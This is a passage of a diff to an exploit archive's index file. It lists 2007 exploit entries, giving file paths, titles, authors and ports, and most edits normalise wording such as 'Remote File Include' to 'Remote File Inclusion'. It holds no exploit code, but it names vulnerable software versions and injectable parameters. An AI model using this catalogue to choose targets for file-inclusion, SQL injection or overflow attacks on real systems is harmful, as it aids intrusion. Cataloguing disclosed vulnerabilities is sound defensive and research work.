3211,platforms/windows/remote/3211.py,"CA BrightStor ARCserve (msgeng.exe) Remote Heap Overflow Exploit",2007-01-27,"Winny Thomas",windows,remote,6503 -3212,platforms/php/webapps/3212.txt,"phpMyReports <= 3.0.11 - (lib_head.php) Remote File Include",2007-01-27,GoLd_M,php,webapps,0 +3212,platforms/php/webapps/3212.txt,"phpMyReports 3.0.11 - (lib_head.php) Remote File Inclusion",2007-01-27,GoLd_M,php,webapps,0 3213,platforms/linux/local/3213.c,"Trend Micro VirusWall 3.81 - (vscan/VSAPI) Local Buffer Overflow Exploit",2007-01-28,"Sebastian Wolfgarten",linux,local,0 -3214,platforms/php/webapps/3214.pl,"EclipseBB 0.5.0 Lite (phpbb_root_path) Remote File Include Exploit",2007-01-28,"Mehmet Ince",php,webapps,0 -3215,platforms/php/webapps/3215.pl,"Foro Domus 2.10 - (phpbb_root_path) Remote File Include Exploit",2007-01-28,"Mehmet Ince",php,webapps,0 -3216,platforms/php/webapps/3216.txt,"xNews 1.3 - (xNews.php) Remote SQL Injection",2007-01-28,ajann,php,webapps,0 -3217,platforms/php/webapps/3217.txt,"PhP Generic library & framework - (include_path) RFI",2007-01-28,"Mehmet Ince",php,webapps,0 +3214,platforms/php/webapps/3214.pl,"EclipseBB 0.5.0 Lite (phpbb_root_path) Remote File Inclusion Exploit",2007-01-28,"Mehmet Ince",php,webapps,0 +3215,platforms/php/webapps/3215.pl,"Foro Domus 2.10 - (phpbb_root_path) Remote File Inclusion Exploit",2007-01-28,"Mehmet Ince",php,webapps,0 +3216,platforms/php/webapps/3216.txt,"xNews 1.3 - (xNews.php) SQL Injection",2007-01-28,ajann,php,webapps,0 +3217,platforms/php/webapps/3217.txt,"PhP Generic library & framework - (include_path) Remote File Inclusion",2007-01-28,"Mehmet Ince",php,webapps,0 3218,platforms/windows/remote/3218.pl,"CA BrightStor ARCserve (msgeng.exe) - Remote Heap Overflow Exploit (2)",2007-01-28,"Jacopo Cervini",windows,remote,6503 3219,platforms/osx/local/3219.rb,"Mac OS X 10.4.8 (8L2127) - crashdump Privilege Escalation Exploit",2007-01-29,MoAB,osx,local,0 3220,platforms/windows/local/3220.c,"Multiple Printer Providers (spooler service) - Privilege Escalation Exploit",2007-01-29,"Andres Tarasco",windows,local,0 -3221,platforms/php/webapps/3221.php,"GuppY <= 4.5.16 - Remote Commands Execution Exploit",2007-01-29,rgod,php,webapps,0 -3222,platforms/php/webapps/3222.txt,"Webfwlog <= 0.92 - (debug.php) Remote File Disclosure",2007-01-29,GoLd_M,php,webapps,0 +3221,platforms/php/webapps/3221.php,"GuppY 4.5.16 - Remote Commands Execution Exploit",2007-01-29,rgod,php,webapps,0 +3222,platforms/php/webapps/3222.txt,"Webfwlog 0.92 - (debug.php) Remote File Disclosure",2007-01-29,GoLd_M,php,webapps,0 3223,platforms/cgi/dos/3223.pl,"CVSTrac 2.0.0 - Post-Attack Database Resurrection DoS Exploit",2007-01-29,"Ralf S. Engelschall",cgi,dos,0 3224,platforms/windows/dos/3224.c,"Intel 2200BG 802.11 - disassociation packet Kernel Memory Corruption",2007-01-29,"Breno Silva Pinto",windows,dos,0 -3225,platforms/php/webapps/3225.pl,"Galeria Zdjec <= 3.0 - (zd_numer.php) Local File Include Exploit",2007-01-30,ajann,php,webapps,0 +3225,platforms/php/webapps/3225.pl,"Galeria Zdjec 3.0 - (zd_numer.php) Local File Inclusion Exploit",2007-01-30,ajann,php,webapps,0 3226,platforms/php/webapps/3226.txt,"PHPFootball 1.6 - (show.php) Remote Database Disclosure",2007-01-30,ajann,php,webapps,0 -3227,platforms/php/webapps/3227.txt,"CascadianFAQ <= 4.1 - (index.php) Remote SQL Injection",2007-01-30,ajann,php,webapps,0 -3228,platforms/php/webapps/3228.txt,"MyNews <= 4.2.2 - (themefunc.php) Remote File Include",2007-01-30,GoLd_M,php,webapps,0 +3227,platforms/php/webapps/3227.txt,"CascadianFAQ 4.1 - (index.php) SQL Injection",2007-01-30,ajann,php,webapps,0 +3228,platforms/php/webapps/3228.txt,"MyNews 4.2.2 - (themefunc.php) Remote File Inclusion",2007-01-30,GoLd_M,php,webapps,0 3229,platforms/windows/dos/3229.py,"Dev-C++ 4.9.9.2 CPP File Parsing Local Stack Overflow PoC",2007-01-30,shinnai,windows,dos,0 3230,platforms/osx/dos/3230.rb,"Apple iChat Bonjour 3.1.6.441 - Multiple Denial of Service Exploit",2007-01-30,MoAB,osx,dos,0 -3231,platforms/php/webapps/3231.txt,"phpBB2 MODificat <= 0.2.0 - (functions.php) Remote Include",2007-01-30,"Mehmet Ince",php,webapps,0 -3232,platforms/php/webapps/3232.txt,"Michelles L2J Dropcalc <= 4 - Remote SQL Injection",2007-01-31,Codebreak,php,webapps,0 +3231,platforms/php/webapps/3231.txt,"phpBB2 MODificat 0.2.0 - (functions.php) Remote Include",2007-01-30,"Mehmet Ince",php,webapps,0 +3232,platforms/php/webapps/3232.txt,"Michelles L2J Dropcalc 4 - SQL Injection",2007-01-31,Codebreak,php,webapps,0 3233,platforms/asp/webapps/3233.txt,"Fullaspsite Asp Hosting Sitesi (tr) SQL Injection",2007-01-31,cl24zy,asp,webapps,0 -3234,platforms/php/webapps/3234.txt,"ExoPHPDesk <= 1.2.1 - (faq.php) Remote SQL Injection",2007-01-31,ajann,php,webapps,0 -3235,platforms/php/webapps/3235.txt,"Phpbb Tweaked <= 3 - (phpbb_root_path) Remote Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 -3236,platforms/php/webapps/3236.txt,"Hailboards 1.2.0 - (phpbb_root_path) Remote File Include",2007-01-31,"Mehmet Ince",php,webapps,0 -3237,platforms/php/webapps/3237.txt,"Cadre PHP Framework Remote File Include",2007-01-31,y3dips,php,webapps,0 -3238,platforms/php/webapps/3238.txt,"PHPMyRing <= 4.1.3b (fichier) Remote File Include",2007-01-31,ajann,php,webapps,0 -3239,platforms/php/webapps/3239.htm,"Extcalendar <= 2 - (profile.php) Remote User Pass Change Exploit",2007-01-31,ajann,php,webapps,0 -3240,platforms/php/webapps/3240.txt,"JV2 Folder Gallery <= 3.0 - Remote File Include",2007-01-31,"ThE dE@Th",php,webapps,0 -3241,platforms/asp/webapps/3241.txt,"Hunkaray Duyuru Scripti (tr) Remote SQL Injection Exploit",2007-01-31,cl24zy,asp,webapps,0 -3242,platforms/php/webapps/3242.txt,"Omegaboard <= 1.0beta4 - (functions.php) Remote File Include",2007-01-31,"Mehmet Ince",php,webapps,0 -3243,platforms/php/webapps/3243.txt,"Cerulean Portal System 0.7b Remote File Include",2007-01-31,"Mehmet Ince",php,webapps,0 +3234,platforms/php/webapps/3234.txt,"ExoPHPDesk 1.2.1 - (faq.php) SQL Injection",2007-01-31,ajann,php,webapps,0 +3235,platforms/php/webapps/3235.txt,"Phpbb Tweaked 3 - (phpbb_root_path) Remote Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 +3236,platforms/php/webapps/3236.txt,"Hailboards 1.2.0 - (phpbb_root_path) Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 +3237,platforms/php/webapps/3237.txt,"Cadre PHP Framework Remote File Inclusion",2007-01-31,y3dips,php,webapps,0 +3238,platforms/php/webapps/3238.txt,"PHPMyRing 4.1.3b (fichier) Remote File Inclusion",2007-01-31,ajann,php,webapps,0 +3239,platforms/php/webapps/3239.htm,"Extcalendar 2 - (profile.php) Remote User Pass Change Exploit",2007-01-31,ajann,php,webapps,0 +3240,platforms/php/webapps/3240.txt,"JV2 Folder Gallery 3.0 - Remote File Inclusion",2007-01-31,"ThE dE@Th",php,webapps,0 +3241,platforms/asp/webapps/3241.txt,"Hunkaray Duyuru Scripti (tr) SQL Injection Exploit",2007-01-31,cl24zy,asp,webapps,0 +3242,platforms/php/webapps/3242.txt,"Omegaboard 1.0beta4 - (functions.php) Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 +3243,platforms/php/webapps/3243.txt,"Cerulean Portal System 0.7b Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 3244,platforms/windows/remote/3244.py,"CA BrightStor ARCserve - (lgserver.exe) Remote Stack Overflow Exploit",2007-02-01,"Winny Thomas",windows,remote,1900 -3245,platforms/php/webapps/3245.txt,"SIPS <= 0.3.1 - (box.inc.php) Remote File Include",2007-02-01,ajann,php,webapps,0 -3246,platforms/php/webapps/3246.txt,"phpEventMan 1.0.2 - (level) Remote File Include Vulnerabilities",2007-02-01,"Mehmet Ince",php,webapps,0 -3247,platforms/php/webapps/3247.txt,"Epistemon 1.0 - (common.php inc_path) Remote File Include",2007-02-01,GoLd_M,php,webapps,0 +3245,platforms/php/webapps/3245.txt,"SIPS 0.3.1 - (box.inc.php) Remote File Inclusion",2007-02-01,ajann,php,webapps,0 +3246,platforms/php/webapps/3246.txt,"phpEventMan 1.0.2 - (level) Remote File Inclusion Vulnerabilities",2007-02-01,"Mehmet Ince",php,webapps,0 +3247,platforms/php/webapps/3247.txt,"Epistemon 1.0 - (common.php inc_path) Remote File Inclusion",2007-02-01,GoLd_M,php,webapps,0 3248,platforms/windows/dos/3248.rb,"CA BrightStor ARCserve 11.5.2.0 - (catirpc.dll) RPC Server DoS Exploit",2007-02-01,Shirkdog,windows,dos,0 -3249,platforms/php/webapps/3249.txt,"WebBuilder 2.0 - (StageLoader.php) Remote File Include",2007-02-01,GoLd_M,php,webapps,0 -3250,platforms/php/webapps/3250.txt,"Portail Web Php <= 2.5.1 - (includes.php) Remote File Inclusion",2007-02-01,"laurent gaffié ",php,webapps,0 -3251,platforms/php/webapps/3251.txt,"CoD2: DreamStats <= 4.2 - (index.php) Remote File Include",2007-02-02,"ThE dE@Th",php,webapps,0 -3252,platforms/php/webapps/3252.txt,"EQdkp <= 1.3.1 - (Referer Spoof) Remote Database Backup",2007-02-02,Eight10,php,webapps,0 -3253,platforms/php/webapps/3253.txt,"Flipper Poll 1.1.0 - (poll.php root_path) Remote File Include",2007-02-02,"Mehmet Ince",php,webapps,0 +3249,platforms/php/webapps/3249.txt,"WebBuilder 2.0 - (StageLoader.php) Remote File Inclusion",2007-02-01,GoLd_M,php,webapps,0 +3250,platforms/php/webapps/3250.txt,"Portail Web Php 2.5.1 - (includes.php) Remote File Inclusion",2007-02-01,"laurent gaffié ",php,webapps,0 +3251,platforms/php/webapps/3251.txt,"CoD2: DreamStats 4.2 - (index.php) Remote File Inclusion",2007-02-02,"ThE dE@Th",php,webapps,0 +3252,platforms/php/webapps/3252.txt,"EQdkp 1.3.1 - (Referer Spoof) Remote Database Backup",2007-02-02,Eight10,php,webapps,0 +3253,platforms/php/webapps/3253.txt,"Flipper Poll 1.1.0 - (poll.php root_path) Remote File Inclusion",2007-02-02,"Mehmet Ince",php,webapps,0 3254,platforms/windows/dos/3254.py,"Remotesoft .NET Explorer 2.0.1 - Local Stack Overflow PoC",2007-02-02,shinnai,windows,dos,0 -3255,platforms/php/webapps/3255.php,"F3Site <= 2.1 - Remote Code Execution Exploit",2007-02-02,Kacper,php,webapps,0 -3256,platforms/php/webapps/3256.txt,"dB Masters Curium CMS <= 1.03 - (c_id) Remote SQL Injection",2007-02-02,ajann,php,webapps,0 +3255,platforms/php/webapps/3255.php,"F3Site 2.1 - Remote Code Execution Exploit",2007-02-02,Kacper,php,webapps,0 +3256,platforms/php/webapps/3256.txt,"dB Masters Curium CMS 1.03 - (c_id) SQL Injection",2007-02-02,ajann,php,webapps,0 3257,platforms/osx/dos/3257.php,"Chicken of the VNC 2.0 - (NULL-pointer) Remote Denial of Service Exploit",2007-02-02,poplix,osx,dos,0 -3258,platforms/php/webapps/3258.txt,"phpBB ezBoard converter 0.2 - (ezconvert_dir) Remote File Include Exploit",2007-02-02,"Mehmet Ince",php,webapps,0 -3259,platforms/php/webapps/3259.pl,"phpBB++ Build 100 - (phpbb_root_path) Remote File Include Exploit",2007-02-02,"Mehmet Ince",php,webapps,0 +3258,platforms/php/webapps/3258.txt,"phpBB ezBoard converter 0.2 - (ezconvert_dir) Remote File Inclusion Exploit",2007-02-02,"Mehmet Ince",php,webapps,0 +3259,platforms/php/webapps/3259.pl,"phpBB++ Build 100 - (phpbb_root_path) Remote File Inclusion Exploit",2007-02-02,"Mehmet Ince",php,webapps,0 3260,platforms/windows/local/3260.txt,"Microsoft Word 2000 Unspecified Code Execution Exploit (0Day)",2007-02-03,xCuter,windows,local,0 -3261,platforms/php/webapps/3261.txt,"Photo Galerie Standard <= 1.1 - (view.php) SQL Injection",2007-02-03,ajann,php,webapps,0 -3262,platforms/php/webapps/3262.php,"Woltlab Burning Board Lite <= 1.0.2pl3e (pms.php) SQL Injection Exploit",2007-02-03,rgod,php,webapps,0 -3263,platforms/php/webapps/3263.txt,"KDPics <= 1.11 - (exif.php lib_path) Remote File Include",2007-02-03,AsTrex,php,webapps,0 +3261,platforms/php/webapps/3261.txt,"Photo Galerie Standard 1.1 - (view.php) SQL Injection",2007-02-03,ajann,php,webapps,0 +3262,platforms/php/webapps/3262.php,"Woltlab Burning Board Lite 1.0.2pl3e (pms.php) SQL Injection Exploit",2007-02-03,rgod,php,webapps,0 +3263,platforms/php/webapps/3263.txt,"KDPics 1.11 - (exif.php lib_path) Remote File Inclusion",2007-02-03,AsTrex,php,webapps,0 3264,platforms/windows/remote/3264.pl,"Imail 8.10-8.12 - (RCPT TO) Remote Buffer Overflow Exploit",2007-02-04,"Jacopo Cervini",windows,remote,25 3265,platforms/windows/remote/3265.pm,"Imail 8.10-8.12 - (RCPT TO) Remote Buffer Overflow Exploit (Metasploit)",2007-02-04,"Jacopo Cervini",windows,remote,25 -3266,platforms/php/webapps/3266.txt,"Flip 2.01 final - (previewtheme.php inc_path) RFI",2007-02-04,GoLd_M,php,webapps,0 +3266,platforms/php/webapps/3266.txt,"Flip 2.01 final - (previewtheme.php inc_path) Remote File Inclusion",2007-02-04,GoLd_M,php,webapps,0 3267,platforms/php/webapps/3267.txt,"Geeklog 2 - (BaseView.php) Remote File Inclusion",2007-02-05,GoLd_M,php,webapps,0 -3268,platforms/php/webapps/3268.txt,"SMA-DB <= 0.3.9 - (settings.php) Remote File Inclusion",2007-02-05,"ThE dE@Th",php,webapps,0 +3268,platforms/php/webapps/3268.txt,"SMA-DB 0.3.9 - (settings.php) Remote File Inclusion",2007-02-05,"ThE dE@Th",php,webapps,0 3269,platforms/multiple/remote/3269.pl,"Oracle 9i/10g DBMS_EXPORT_EXTENSION SQL Injection Exploit",2007-02-05,bunker,multiple,remote,0 -3270,platforms/php/webapps/3270.pl,"Categories hierarchy phpBB Mod 2.1.2 - (phpbb_root_path) RFI Exploit",2007-02-05,"Mehmet Ince",php,webapps,0 -3271,platforms/php/webapps/3271.php,"GGCMS <= 1.1.0 RC1 - Remote Code Execution Exploit",2007-02-05,Kacper,php,webapps,0 +3270,platforms/php/webapps/3270.pl,"Categories hierarchy phpBB Mod 2.1.2 - (phpbb_root_path) Remote File Inclusion Exploit",2007-02-05,"Mehmet Ince",php,webapps,0 +3271,platforms/php/webapps/3271.php,"GGCMS 1.1.0 RC1 - Remote Code Execution Exploit",2007-02-05,Kacper,php,webapps,0 3272,platforms/windows/dos/3272.html,"Microsoft Internet Explorer 6 - (mshtml.dll) Null Pointer Dereference Exploit",2007-02-05,AmesianX,windows,dos,0 3273,platforms/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - (ps) Information Leak Exploit",2007-02-06,bunker,tru64,local,0 3274,platforms/windows/remote/3274.txt,"MySQL 4.x/5.0 - User-Defined Function (UDF) Command Execution Exploit (Windows)",2007-02-06,"Marco Ivaldi",windows,remote,3306 -3275,platforms/php/webapps/3275.txt,"LightRO CMS 1.0 - (inhalt.php) Remote File Include",2007-02-06,ajann,php,webapps,0 +3275,platforms/php/webapps/3275.txt,"LightRO CMS 1.0 - (inhalt.php) Remote File Inclusion",2007-02-06,ajann,php,webapps,0 3276,platforms/windows/dos/3276.cpp,"FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow DoS Exploit",2007-02-06,Marsu,windows,dos,0 3277,platforms/windows/dos/3277.cpp,"SmartFTP Client 2.0.1002 - Remote Heap Overflow DoS Exploit",2007-02-06,Marsu,windows,dos,0 -3278,platforms/php/webapps/3278.txt,"Kisisel Site 2007 - (tr) Remote SQL Injection",2007-02-06,cl24zy,php,webapps,0 +3278,platforms/php/webapps/3278.txt,"Kisisel Site 2007 - (tr) SQL Injection",2007-02-06,cl24zy,php,webapps,0 3279,platforms/windows/remote/3279.html,"Alibaba Alipay (Remove ActiveX) Remote Code Execution Exploit",2007-02-06,cocoruder,windows,remote,0 -3280,platforms/php/webapps/3280.txt,"AgerMenu 0.01 - (top.inc.php rootdir) Remote File Include",2007-02-07,GoLd_M,php,webapps,0 -3281,platforms/php/webapps/3281.txt,"WebMatic 2.6 - (index_album.php) Remote File Include",2007-02-07,MadNet,php,webapps,0 -3282,platforms/php/webapps/3282.pl,"Advanced Poll <= 2.0.5-dev Remote Admin Session Generator Exploit",2007-02-07,diwou,php,webapps,0 -3283,platforms/php/webapps/3283.txt,"otscms <= 2.1.5 - (SQL/XSS) Multiple Vulnerabilities",2007-02-07,GregStar,php,webapps,0 -3284,platforms/php/webapps/3284.txt,"Maian Recipe 1.0 - (path_to_folder) Remote File Include",2007-02-07,Denven,php,webapps,0 -3285,platforms/php/webapps/3285.htm,"Site-Assistant <= 0990 - (paths[version]) Remote File Include Exploit",2007-02-08,ajann,php,webapps,0 -3286,platforms/php/webapps/3286.asp,"LightRO CMS 1.0 - (index.php projectid) Remote SQL Injection Exploit",2007-02-08,ajann,php,webapps,0 -3287,platforms/php/webapps/3287.asp,"LushiNews <= 1.01 - (comments.php) Remote SQL Injection Exploit",2007-02-08,ajann,php,webapps,0 -3288,platforms/php/webapps/3288.asp,"LushiWarPlaner 1.0 - (register.php) Remote SQL Injection Exploit",2007-02-08,ajann,php,webapps,0 -3289,platforms/linux/dos/3289.c,"Axigen <= 2.0.0b1 - Remote Denial of Service Exploit",2007-02-08,mu-b,linux,dos,0 -3290,platforms/linux/dos/3290.c,"Axigen <= 2.0.0b1 - Remote Denial of Service Exploit (2)",2007-02-08,mu-b,linux,dos,0 +3280,platforms/php/webapps/3280.txt,"AgerMenu 0.01 - (top.inc.php rootdir) Remote File Inclusion",2007-02-07,GoLd_M,php,webapps,0 +3281,platforms/php/webapps/3281.txt,"WebMatic 2.6 - (index_album.php) Remote File Inclusion",2007-02-07,MadNet,php,webapps,0 +3282,platforms/php/webapps/3282.pl,"Advanced Poll 2.0.5-dev Remote Admin Session Generator Exploit",2007-02-07,diwou,php,webapps,0 +3283,platforms/php/webapps/3283.txt,"otscms 2.1.5 - (SQL/XSS) Multiple Vulnerabilities",2007-02-07,GregStar,php,webapps,0 +3284,platforms/php/webapps/3284.txt,"Maian Recipe 1.0 - (path_to_folder) Remote File Inclusion",2007-02-07,Denven,php,webapps,0 +3285,platforms/php/webapps/3285.htm,"Site-Assistant 0990 - (paths[version]) Remote File Inclusion Exploit",2007-02-08,ajann,php,webapps,0 +3286,platforms/php/webapps/3286.asp,"LightRO CMS 1.0 - (index.php projectid) SQL Injection Exploit",2007-02-08,ajann,php,webapps,0 +3287,platforms/php/webapps/3287.asp,"LushiNews 1.01 - (comments.php) SQL Injection Exploit",2007-02-08,ajann,php,webapps,0 +3288,platforms/php/webapps/3288.asp,"LushiWarPlaner 1.0 - (register.php) SQL Injection Exploit",2007-02-08,ajann,php,webapps,0 +3289,platforms/linux/dos/3289.c,"Axigen 2.0.0b1 - Remote Denial of Service Exploit",2007-02-08,mu-b,linux,dos,0 +3290,platforms/linux/dos/3290.c,"Axigen 2.0.0b1 - Remote Denial of Service Exploit (2)",2007-02-08,mu-b,linux,dos,0 3291,platforms/windows/remote/3291.pl,"SAP Web Application Server 6.40 - Arbitrary File Disclosure Exploit",2007-02-08,Nicob,windows,remote,0 3292,platforms/php/webapps/3292.txt,"OPENi-CMS Site Protection Plugin Remote File Inclusion",2007-02-11,y3dips,php,webapps,0 3293,platforms/solaris/remote/3293.sh,"SunOS 5.10/5.11 in.telnetd Remote Authentication Bypass Exploit",2007-02-11,kingcope,solaris,remote,23 3294,platforms/hardware/remote/3294.txt,"IP3 NetAccess < 4.1.9.6 - Remote Arbitrary File Disclosure",2007-02-11,"Sebastian Wolfgarten",hardware,remote,80 -3295,platforms/asp/webapps/3295.txt,"Philboard <= 1.14 - (philboard_forum.asp) SQL Injection",2007-02-12,"Mehmet Ince",asp,webapps,0 +3295,platforms/asp/webapps/3295.txt,"Philboard 1.14 - (philboard_forum.asp) SQL Injection",2007-02-12,"Mehmet Ince",asp,webapps,0 3296,platforms/windows/remote/3296.c,"uTorrent 1.6 build 474 - (announce) Key Remote Heap Overflow Exploit",2007-02-12,defsec,windows,remote,0 -3297,platforms/php/webapps/3297.htm,"AT Contenator <= 1.0 - (Root_To_Script) Remote File Include Exploit",2007-02-13,ajann,php,webapps,0 -3298,platforms/php/webapps/3298.pl,"Xaran CMS <= 2.0 - (xarancms_haupt.php) SQL Injection Exploit",2007-02-13,ajann,php,webapps,0 -3299,platforms/php/webapps/3299.pl,"phpCC <= 4.2 beta (nickpage.php npid) Remote SQL Injection Exploit",2007-02-13,ajann,php,webapps,0 -3300,platforms/php/webapps/3300.pl,"Advanced Poll <= 2.0.5-dev Remote Code Execution Exploit",2007-02-13,diwou,php,webapps,0 +3297,platforms/php/webapps/3297.htm,"AT Contenator 1.0 - (Root_To_Script) Remote File Inclusion Exploit",2007-02-13,ajann,php,webapps,0 +3298,platforms/php/webapps/3298.pl,"Xaran CMS 2.0 - (xarancms_haupt.php) SQL Injection Exploit",2007-02-13,ajann,php,webapps,0 +3299,platforms/php/webapps/3299.pl,"phpCC 4.2 beta (nickpage.php npid) SQL Injection Exploit",2007-02-13,ajann,php,webapps,0 +3300,platforms/php/webapps/3300.pl,"Advanced Poll 2.0.5-dev Remote Code Execution Exploit",2007-02-13,diwou,php,webapps,0 3301,platforms/asp/webapps/3301.txt,"PollMentor 2.0 - (pollmentorres.asp id) SQL Injection",2007-02-13,SaO,asp,webapps,0 -3302,platforms/windows/remote/3302.sh,"Lotus Domino <= R6 Webmail Remote Password Hash Dumper Exploit",2007-02-13,"Marco Ivaldi",windows,remote,80 -3303,platforms/multiple/remote/3303.sh,"Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE - Timing Attack Exploit",2007-02-13,"Marco Ivaldi",multiple,remote,0 -3304,platforms/windows/dos/3304.py,"MiniWebsvr <= 0.0.6 - Remote Resource Consumption DoS Exploit",2007-02-13,shinnai,windows,dos,0 +3302,platforms/windows/remote/3302.sh,"Lotus Domino R6 Webmail Remote Password Hash Dumper Exploit",2007-02-13,"Marco Ivaldi",windows,remote,80 +3303,platforms/multiple/remote/3303.sh,"Portable OpenSSH 3.6.1p-PAM / 4.1-SUSE - Timing Attack Exploit",2007-02-13,"Marco Ivaldi",multiple,remote,0 +3304,platforms/windows/dos/3304.py,"MiniWebsvr 0.0.6 - Remote Resource Consumption DoS Exploit",2007-02-13,shinnai,windows,dos,0 3305,platforms/php/webapps/3305.txt,"nabopoll 1.2 - Remote Unprotected Admin Section",2007-02-13,sn0oPy,php,webapps,0 -3306,platforms/windows/dos/3306.pl,"MailEnable Professional/Enterprise <= 2.35 Out of Bounds DoS Exploit",2007-02-14,mu-b,windows,dos,0 +3306,platforms/windows/dos/3306.pl,"MailEnable Professional/Enterprise 2.35 Out of Bounds DoS Exploit",2007-02-14,mu-b,windows,dos,0 3307,platforms/windows/dos/3307.html,"ActSoft DVD-Tools - (dvdtools.ocx) Remote Buffer Overflow Exploit PoC",2007-02-14,shinnai,windows,dos,0 -3308,platforms/windows/dos/3308.pl,"MailEnable Professional/Enterprise <= 2.37 - Denial of Service Exploit",2007-02-14,mu-b,windows,dos,0 -3309,platforms/php/webapps/3309.txt,"Jupiter CMS 1.1.5 - (index.php) Local/Remote File Include",2007-02-14,DarkFig,php,webapps,0 -3310,platforms/php/webapps/3310.php,"Jupiter CMS 1.1.5 - (Client-IP) Remote SQL Injection Exploit",2007-02-14,DarkFig,php,webapps,0 +3308,platforms/windows/dos/3308.pl,"MailEnable Professional/Enterprise 2.37 - Denial of Service Exploit",2007-02-14,mu-b,windows,dos,0 +3309,platforms/php/webapps/3309.txt,"Jupiter CMS 1.1.5 - (index.php) Remote/Local File Inclusion",2007-02-14,DarkFig,php,webapps,0 +3310,platforms/php/webapps/3310.php,"Jupiter CMS 1.1.5 - (Client-IP) SQL Injection Exploit",2007-02-14,DarkFig,php,webapps,0 3311,platforms/php/webapps/3311.php,"Jupiter CMS 1.1.5 - Remote File Upload Exploit",2007-02-14,DarkFig,php,webapps,0 3312,platforms/php/webapps/3312.pl,"Drupal < 5.1 - (post comments) Remote Command Execution Exploit (2)",2007-02-15,str0ke,php,webapps,0 3313,platforms/php/webapps/3313.pl,"Drupal < 4.7.6 - (post comments) Remote Command Execution Exploit (2)",2007-02-15,str0ke,php,webapps,0 -3314,platforms/php/webapps/3314.txt,"ZebraFeeds 1.0 - (zf_path) Remote File Include Vulnerabilities",2007-02-15,"ThE dE@Th",php,webapps,0 -3315,platforms/php/webapps/3315.txt,"nabopoll 1.2 - (survey.inc.php path) Remote File Include",2007-02-15,Cr@zy_King,php,webapps,0 -3317,platforms/asp/webapps/3317.txt,"CodeAvalanche News 1.x - (CAT_ID) Remote SQL Injection",2007-02-15,beks,asp,webapps,0 -3318,platforms/asp/webapps/3318.txt,"Aktueldownload Haber scripti (id) Remote SQL Injection",2007-02-15,"Mehmet Ince",asp,webapps,0 -3319,platforms/windows/remote/3319.pl,"MailEnable Enterprise <= 2.32 < 2.34 - Remote Buffer Overflow Exploit",2007-02-16,mu-b,windows,remote,143 +3314,platforms/php/webapps/3314.txt,"ZebraFeeds 1.0 - (zf_path) Remote File Inclusion Vulnerabilities",2007-02-15,"ThE dE@Th",php,webapps,0 +3315,platforms/php/webapps/3315.txt,"nabopoll 1.2 - (survey.inc.php path) Remote File Inclusion",2007-02-15,Cr@zy_King,php,webapps,0 +3317,platforms/asp/webapps/3317.txt,"CodeAvalanche News 1.x - (CAT_ID) SQL Injection",2007-02-15,beks,asp,webapps,0 +3318,platforms/asp/webapps/3318.txt,"Aktueldownload Haber scripti (id) SQL Injection",2007-02-15,"Mehmet Ince",asp,webapps,0 +3319,platforms/windows/remote/3319.pl,"MailEnable Enterprise 2.32 < 2.34 - Remote Buffer Overflow Exploit",2007-02-16,mu-b,windows,remote,143 3320,platforms/windows/remote/3320.pl,"MailEnable Professional 2.35 - Remote Buffer Overflow Exploit",2007-02-16,mu-b,windows,remote,143 3321,platforms/asp/webapps/3321.txt,"Snitz Forums 2000 3.1 SR4 - (pop_profile.asp) SQL Injection",2007-02-16,"Mehmet Ince",asp,webapps,0 -3322,platforms/php/webapps/3322.htm,"VS-News-System <= 1.2.1 - (newsordner) Remote File Include Exploit",2007-02-16,ajann,php,webapps,0 -3323,platforms/php/webapps/3323.htm,"VS-Link-Partner <= 2.1 - (script_pfad) Remote File Include Exploit",2007-02-16,ajann,php,webapps,0 -3324,platforms/php/webapps/3324.txt,"Htaccess Passwort Generator 1.1 - (ht_pfad) RFI",2007-02-16,kezzap66345,php,webapps,0 +3322,platforms/php/webapps/3322.htm,"VS-News-System 1.2.1 - (newsordner) Remote File Inclusion Exploit",2007-02-16,ajann,php,webapps,0 +3323,platforms/php/webapps/3323.htm,"VS-Link-Partner 2.1 - (script_pfad) Remote File Inclusion Exploit",2007-02-16,ajann,php,webapps,0 +3324,platforms/php/webapps/3324.txt,"Htaccess Passwort Generator 1.1 - (ht_pfad) Remote File Inclusion",2007-02-16,kezzap66345,php,webapps,0 3325,platforms/php/webapps/3325.pl,"webSPELL 4.01.02 - (showonly) Remote Blind SQL Injection Exploit",2007-02-16,DNX,php,webapps,0 3326,platforms/php/webapps/3326.txt,"Vivvo Article Manager 3.4 - (root) Local File Inclusion",2007-02-16,Snip0r,php,webapps,0 -3327,platforms/php/webapps/3327.txt,"XLAtunes 0.1 - (album) Remote SQL Injection",2007-02-17,Bl0od3r,php,webapps,0 -3328,platforms/php/webapps/3328.htm,"S-Gastebuch <= 1.5.3 - (gb_pfad) Remote File Include Exploit",2007-02-18,ajann,php,webapps,0 +3327,platforms/php/webapps/3327.txt,"XLAtunes 0.1 - (album) SQL Injection",2007-02-17,Bl0od3r,php,webapps,0 +3328,platforms/php/webapps/3328.htm,"S-Gastebuch 1.5.3 - (gb_pfad) Remote File Inclusion Exploit",2007-02-18,ajann,php,webapps,0 3329,platforms/linux/remote/3329.c,"Axigen eMail Server 2.0.0b2 - (pop3) Remote Format String Exploit",2007-02-18,fuGich,linux,remote,110 3330,platforms/linux/local/3330.pl,"ProFTPD 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow Exploit (1)",2007-02-18,Revenge,linux,local,0 3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 - (CWD) Remote Buffer Overflow Exploit PoC",2007-02-18,r0ut3r,windows,dos,0 3332,platforms/php/webapps/3332.pl,"Xpression News 1.0.1 - (archives.php) Remote File Disclosure Exploit",2007-02-18,r0ut3r,php,webapps,0 3333,platforms/linux/local/3333.pl,"ProFTPD 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow Exploit (2)",2007-02-19,Revenge,linux,local,0 -3334,platforms/php/webapps/3334.asp,"PHP-Nuke Module Emporium <= 2.3.0 - Remote SQL Injection Exploit",2007-02-19,ajann,php,webapps,0 +3334,platforms/php/webapps/3334.asp,"PHP-Nuke Module Emporium 2.3.0 - SQL Injection Exploit",2007-02-19,ajann,php,webapps,0 3335,platforms/windows/remote/3335.pm,"IPSwitch WS-FTP 5.05 - (XMD5) Remote Buffer Overflow 